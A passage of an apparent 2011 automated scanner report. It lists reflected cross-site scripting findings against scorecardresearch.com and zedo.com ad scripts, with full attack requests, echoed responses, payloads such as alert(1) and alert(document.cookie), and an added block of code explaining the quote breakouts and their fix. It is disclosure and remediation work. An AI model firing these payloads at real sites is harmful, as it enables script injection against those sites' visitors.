COMSCORE.beacon({c1:"2", c2:"6035786", c3:"603578626bb2<script>alert(1)</script>dadffb12f82", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.10. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload f09c8<script>alert(1)</script>b3efd23cef2 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=f09c8<script>alert(1)</script>b3efd23cef2&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 26 Jan 2011 17:59:29 GMT
Date: Wed, 19 Jan 2011 17:59:29 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"6035786", c3:"6035786", c4:"f09c8<script>alert(1)</script>b3efd23cef2", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.11. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 77439<script>alert(1)</script>58583c10800 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=77439<script>alert(1)</script>58583c10800&c6=&c15=&tm=919330 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 26 Jan 2011 17:59:32 GMT
Date: Wed, 19 Jan 2011 17:59:32 GMT
Connection: close
Content-Length: 3581

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"77439<script>alert(1)</script>58583c10800", c6:"", c10:"", c15:"", c16:"", r:""});

4.12. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 147af<script>alert(1)</script>202194faed4 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=147af<script>alert(1)</script>202194faed4&c15=&tm=919330 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 26 Jan 2011 17:59:34 GMT
Date: Wed, 19 Jan 2011 17:59:34 GMT
Connection: close
Content-Length: 3581

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"147af<script>alert(1)</script>202194faed4", c10:"", c15:"", c16:"", r:""});

4.13. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daf00'%3balert(1)//9a4146cf137 was submitted in the $ parameter. This input was echoed as daf00';alert(1)//9a4146cf137 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=daf00'%3balert(1)//9a4146cf137&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:daf00';alert(1)//9a4146cf137;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=524
Expires: Wed, 19 Jan 2011 18:09:46 GMT
Date: Wed, 19 Jan 2011 18:01:02 GMT
Connection: close
Content-Length: 1990

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',daf00';alert(1)//9a4146cf137';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,daf00';alert(1)//9a4146cf137;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

4.14. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e01e"%3balert(1)//82425b7431e was submitted in the $ parameter. This input was echoed as 1e01e";alert(1)//82425b7431e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=1e01e"%3balert(1)//82425b7431e&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:1e01e";alert(1)//82425b7431e;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=524
Expires: Wed, 19 Jan 2011 18:09:46 GMT
Date: Wed, 19 Jan 2011 18:01:02 GMT
Connection: close
Content-Length: 1990

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',1e01e";alert(1)//82425b7431e';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,1e01e";alert(1)//82425b7431e;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                                                                           var zzStr = "s=1
...[SNIP]...

4.15. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a19b1'-alert(1)-'4b1450f596b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?a19b1'-alert(1)-'4b1450f596b=1 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 941
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "81ee0daa-82a5-4989a5927aac0"
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=253
Expires: Wed, 19 Jan 2011 18:11:59 GMT
Date: Wed, 19 Jan 2011 18:07:46 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d3;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-401/d3/jsc/fm.js;qs=a19b1'-alert(1)-'4b1450f596b=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

4.16. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd682'%3balert(1)//8194c718852 was submitted in the q parameter. This input was echoed as fd682';alert(1)//8194c718852 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=fd682'%3balert(1)//8194c718852&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=526
Expires: Wed, 19 Jan 2011 18:09:46 GMT
Date: Wed, 19 Jan 2011 18:01:00 GMT
Connection: close
Content-Length: 1987

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='fd682';alert(1)//8194c718852';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=fd682';alert(1)//8194c718852;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

4.17. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae34c"%3balert(1)//b23cf797565 was submitted in the q parameter. This input was echoed as ae34c";alert(1)//b23cf797565 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
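The break-outs in 4.15 through 4.17 (and the fmr.js variants that follow) all come from the same template: the parameter value is pasted raw between the quotes of a JavaScript string literal, so a quote character in the input ends the literal and the remainder of the value is parsed as code. The block below is an added example, not ZEDO's code. It reproduces the single-quote and double-quote break-outs with the report's own payloads, then shows the fix: serialise the value as a JavaScript string literal (JSON.stringify, plus escapes for `</` and the U+2028/U+2029 line terminators) instead of concatenating it between quotes. The helper names renderUnsafe, renderSafe, jsStringLiteral, alertFired and roundTrip are this example's own.

```javascript
// Added example (not ZEDO's code): reproduce the JS string-context break-outs
// reported above and show the encoding that closes them.

// Vulnerable pattern, modelled on the fm.js/fmr.js responses in this report:
// the parameter value is concatenated raw inside a quoted JS string literal.
function renderUnsafe(q) {
  return "var zzPat='" + q + "';var zzStr=\"q=" + q + ";z=\"+Math.random();";
}

// Hardened pattern: emit the value as a JS string literal. JSON.stringify
// escapes both quote characters, backslashes and control characters; the extra
// replaces cover what JSON leaves alone: "</" (which would close an inline
// <script> block) and U+2028/U+2029 (line terminators in older engines).
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/<\//g, "<\\/")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

function renderSafe(q) {
  const lit = jsStringLiteral(q);
  return "var zzPat=" + lit + ";var zzStr=\"q=\"+" + lit + "+\";z=\"+Math.random();";
}

// Test harness: execute the generated script with alert() bound to a recorder,
// so we can tell whether the payload escaped the string literal. A SyntaxError
// means the injection broke the script without executing; that is reported
// separately because it is still a bug.
function alertFired(script) {
  let fired = false;
  try {
    new Function("alert", script)(function () { fired = true; });
  } catch (e) {
    return { fired: fired, error: e.name };
  }
  return { fired: fired, error: null };
}

// Runs the hardened script and returns the value zzPat ended up holding, to
// confirm the encoding is lossless.
function roundTrip(q) {
  return new Function(renderSafe(q) + "return zzPat;")();
}

// Payloads copied verbatim from findings 4.15 and 4.17 above.
const SINGLE_QUOTE_PAYLOAD = "a19b1'-alert(1)-'4b1450f596b";
const DOUBLE_QUOTE_PAYLOAD = 'ae34c";alert(1)//b23cf797565';
```

In the vulnerable template the single-quote payload is evaluated as the expression `'a19b1' - alert(1) - '4b1450f596b'`, and the double-quote payload terminates `zzStr` early so that `alert(1)` becomes its own statement with the trailing `//` commenting out the remainder of the line. Both run alert(); the serialised form does not, and roundTrip shows the original value survives intact.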

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=ae34c"%3balert(1)//b23cf797565&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1479B1099,2#702971|0,1,1;expires=Fri, 18 Feb 2011 18:00:59 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=527
Expires: Wed, 19 Jan 2011 18:09:46 GMT
Date: Wed, 19 Jan 2011 18:00:59 GMT
Connection: close
Content-Length: 2035

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='ae34c";alert(1)//b23cf797565';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=ae34c";alert(1)//b23cf797565;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                           var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=
...[SNIP]...

4.18. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35817"%3balert(1)//c76b7e8cf54 was submitted in the $ parameter. This input was echoed as 35817";alert(1)//c76b7e8cf54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

